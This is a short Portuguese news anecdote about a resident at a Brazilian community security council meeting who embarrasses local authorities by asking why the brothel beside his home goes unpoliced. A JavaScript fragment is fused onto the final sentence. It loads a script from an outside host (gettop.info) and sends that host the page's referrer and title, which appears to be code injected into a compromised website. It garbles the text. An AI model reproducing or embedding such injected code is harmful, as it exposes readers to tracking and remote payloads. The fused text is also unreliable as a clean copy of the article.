Saia justa em reunião do Conselho de Segurança

Transcorria sonolenta a reunião do Conselho de Segurança (Conseg) de uma cidade do DF. Um senhor de aproximadamente 60 anos pede a palavra. “Gostaria de aproveitar a presença do administrador regional, do comandante do batalhão da PM, do delegado e dos fiscais da Agefis para tentar entender uma coisa”.

Privilégio – Todos passaram a prestar atenção. E o homem prosseguiu: “Por que restaurantes, supermercados, farmácias, postos de gasolina e bares são fiscalizados, multados e até interditados, mas ninguém faz nada contra um estabelecimento que funciona até altas horas da madrugada ao lado da minha casa?”.

Mudos – As autoridades logo entenderam que o homem era vizinho do prostíbulo mais frequentado da cidade. Emudeceram. Detalhe: Vários estavam com suas esposas no auditório…s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário